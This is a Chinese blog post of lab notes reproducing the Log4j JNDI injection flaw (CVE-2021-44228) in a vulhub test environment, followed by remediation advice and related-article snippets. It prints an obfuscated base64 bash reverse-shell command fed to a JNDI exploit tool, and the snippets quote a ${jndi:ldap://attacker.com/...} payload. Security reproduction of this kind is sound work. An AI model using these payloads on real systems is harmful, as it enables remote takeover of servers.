漏洞复现笔记(CVE-2021-44228)

于 2024-06-14 14:26:29 发布
阅读量939 收藏 12
点赞数 20
文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_72760965/article/details/139680771
版权

漏洞概述

apache log4j通过定义每一条日志信息的级别能够更加细致地控制日志生成地过程,受影响地版本中纯在JNDI注入漏洞,导致日志在记录用户输入地数据时,触发了注入漏洞,该漏洞可导致远程代码执行,且利用条件低,影响范围广。

影响版本

Apache Log4j 2.x <= 2.14.1

  • 受影响组件:

  • Spring-boot-strater-log4j2

  • Apache Solr Apache Flink

  • Apache Druid

环境搭建

使用vulhub搭建靶场

  • 需要docker环境

访问系统

漏洞复现

通过DNSLog平台获取域名fql9lt.dnslog.cn,构造payload:

打开DNSLog Platform获取域名:

Dnslog请求:

1.web服务器回显内容:

2.Dnslog平台信息:

EXP利用:

首先下载工具

下载解压完后直接进入tools文件,然后在该路径下cmd打开

  • 格式:java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “命令” -A “ip(攻击机)”

  • 这里插入的命令必须经过编码,不然无法实现

  • java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMyLjE0NS82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}" -A 192.168.49.1

开启端口监听

执行EXP,生成可用的payload

然后将url拼接构造反弹shell的payload

修复建议

升级到最新版本:Apache官方已发布新版本完成漏洞修复,建议及时升级至最新版本。
添加JVM启动参数:在启动JVM时添加参数-Dlog4j2.formatMsgNoLookups=true,以防止JNDI注入攻击。

纪瑾
关注
  • 20
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2019-9766漏洞复现
玄道的网安博客
09-21 435
简介 Free MP3 CD Ripper是一款音频格式转换器。Free MP3 CD Ripper 2.6版本中存在缓冲区溢出漏洞。远程攻击者可以借助特制的以.mp3为后缀的文件,利用该漏洞执行任意代码。 环境搭建 1.攻击机:kali ip:192.168.111.129 2.靶机:windows10 安装Free MP3 CD Ripper 2.6版本 ip:192.168.3.20 ...
【web安全】CVE漏洞复现
weixin_46301214的博客
11-22 579
漏洞不能直接反弹shell,需要先下载反弹shell文件,然后执行shell文件。当然了使用curl下载前,你需要先搭建一个web服务器,然后上传好shell文件。【CVE-2018-1273】springboot漏洞 - RCE。【CVE-2018-1273】springboot漏洞 - RCE。POC:篡改post传参的输入命令即可触发RCE。云服务器开启端口监听,然后执行一下文件即可。存在路径后,随便输入点东西,然后抓包。特点:无回显触发RCE。先扫路径:/users。
漏洞复现(CVECVE-2017-9064(csrf漏洞))
FODKING的博客
11-29 3247
实验道具 wordpress <=4.7.4 burpsuite 实验原理 要实施一次csrf漏洞利用必须占据“天时地利人和”,即被攻击方登录了要攻击的网站,且点击了我们伪造的url才会成功。并且漏洞点处请求容易伪造。 实验场景 当管理员用户登录时,点击了攻击者事先构建好的url中的提交按钮时就会被盗取用户。 漏洞存在位置,如图1 图 1 抓包后信息如图29所示 图 2 发现并没有token参数,没有不可预料的认证信息用post方式传递,我们用burpsuite自带的CSRF工具进行构建html
【网络安全---漏洞复现】Tomcat CVE-2024-1938 漏洞复现和利用过程(特详细)
最新发布
2401_84264010的博客
05-08 1303
python2 ‘Tomcat-ROOT路径下文件读取(CVE-2020-1938).py’ -p 8009 -f /WEB-INF/web.xml 192.168.31.160。
Apache Log4j 1.x JMSAppender配置代码执行漏洞(CVE-2021-4104)
weixin_44047654的博客
12-11 1144
Apache Log4j 1.x JMSAppender配置代码执行漏洞(CVE-2021-4104)
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
【网络安全---漏洞复现】Tomcat CVE-2020-1938 漏洞复现和利用过程(特详细)
m0_67844671的博客
09-12 1万+
Tomcat CVE-2020-1938 漏洞复现和利用过程(特详细);Apache Tomcat文件包含漏洞(CNVD-2020-10487/CVE-2020-1938)。该漏洞是由于Tomcat AJP协议存在缺陷而导致,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的任意文件。若目标服务器同时存在文件上传功能,攻击者可进一步实现远程代码执行。AJP(Apache JServ Protocol)是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。WEB服务器通过 TCP连接
Log4j漏洞CVE-2021-45046CVE-2021-45105、CVE-2021-4104修复
weixin_44455388的博客
12-22 2069
1、漏洞范围 远程代码执行漏洞CVE-2021-45046:log4j 2.0-2.15.0版本 拒绝服务漏洞CVE-2021-45105:log4j 2.0-2.16.0版本 远程代码执行漏洞CVE-2021-4104:log4 1.x版本 2、漏洞解决: 针对CVE-2021-45046CVE-2021-45105,需要升级到2.17.0版本进行修复。 针对CVE-2021-4104需要从类路径中移除JMSAppender类,可利用如下命令进行删除:zip -q -d log4j-*.jar or
漏洞复现
热门推荐
good good study
03-03 1万+
weblogic WebLogic T3 协议反序列化远程命令执行(CVE-2020-2883) Weblogic Server远程代码执行漏洞CVE-2021-2109 ) apache Struts2 S2-061 远程命令执行漏洞CVE-2020-17530) Apache Druid RCE(CVE-2021-25646) Apache Tomcat 文件包含漏洞CVE-2020-1938) Apache Flink(CVE-2020-17518/17519)任意文件上传和路径遍
CVE-2021-4034漏洞复现
weixin_50825713的博客
01-27 4138
漏洞描述: 最近公开了CVE-2021-4034漏洞,这个漏洞主要就是利用Linux下polkit工具集的本地权限提升漏洞,任何本地非特权用户可以通过这个漏洞获得root权限。 影响范围: 非特权用户可以通过此漏洞获取root权限,目前主流的Linux版本均受影响。 漏洞利用: 先将poc上传到kali or Linux中(这里是普通用户登录)。 然后切换到该目录下查看是否存在。 然后通过gcc编译器进行编译,通过-o指定生成的结果文件。 然后切换到当前目录下的这个新生成.
CVE-2019-11043远程代码执行漏洞复现
qq_42133828的博客
11-02 7195
CVE-2019-11043远程代码执行漏洞复现 漏洞名称: php fastcgi 远程命令执行漏洞 漏洞类型: 远程代码执行漏洞 漏洞危害: 高危 漏洞来源: https://www.nginx.com/blog/php-fpm-cve-2019-11043-vulnerability-nginx/ 公布时间: 2019-10-28 涉及应用版本: <7.1.33的PHP版本7.1.x ...
CVE20190708复现
qq_45284666的博客
11-03 5054
一、实验环境 基于虚拟机运行: (1)靶机(ip:192.168.8.***): (2)测试机(192.168.8.***): (3)将两个虚拟机设置于同一个网段中
CVE-2017-15715漏洞复现
大方子
07-25 1万+
复现环境 docke apache 2.4.0到2.4.29即可 php5.5 复现过程 先在物理机上创建目录 mkdir -p /var/www/html 然后创建个容器,并关联物理机的/var/www/html目录 docker run -d -v /var/www/html:/var/www/html -p 8080:80 --name apache php...
CVE-2021-40444漏洞复现详细
weixin_51203422的博客
09-14 1万+
2021年9月8日,微软官方发布了MSHTML组件的风险通告(漏洞编号:CVE-2021-40444),未经身份验证的攻击者可以利用该漏洞在目标系统上远程执行代码。微软官方表示已经监测到该漏洞存在在野利用。 1、漏洞详情: Microsoft MSHTML远程代码执行漏洞 CVE-2021-40444 严重级别:严重 CVSS:8.8 被利用级别:检测到利用 危害:未经身份验证的攻击者可以利用该漏洞在目标系统上执行代码。 在野利用:微软表示已经发现攻击者利用此漏洞。在Office文档中添...
cve-2021-44228漏洞复现
03-16
cve-2021-44228漏洞是Apache Log4j 2.x中的一个严重漏洞,可以导致远程代码执行。要复现漏洞,需要使用恶意构造的日志消息来触发漏洞。 具体步骤如下: 1. 下载并安装Apache Log4j 2.x版本。 2. 创建一个Java程序,使用Log4j 2.x的API来记录日志。 3. 构造一个恶意的日志消息,其中包含一个特殊的字符序列,例如${jndi:ldap://attacker.com/Exploit}。 4. 将恶意的日志消息记录到日志中。 5. 启动应用程序并查看日志文件,如果存在漏洞,则会触发远程代码执行。 需要注意的是,该漏洞已经被广泛利用,因此建议尽快升级到最新版本的Apache Log4j 2.x,或者禁用Log4j 2.x的JNDI功能来缓解风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值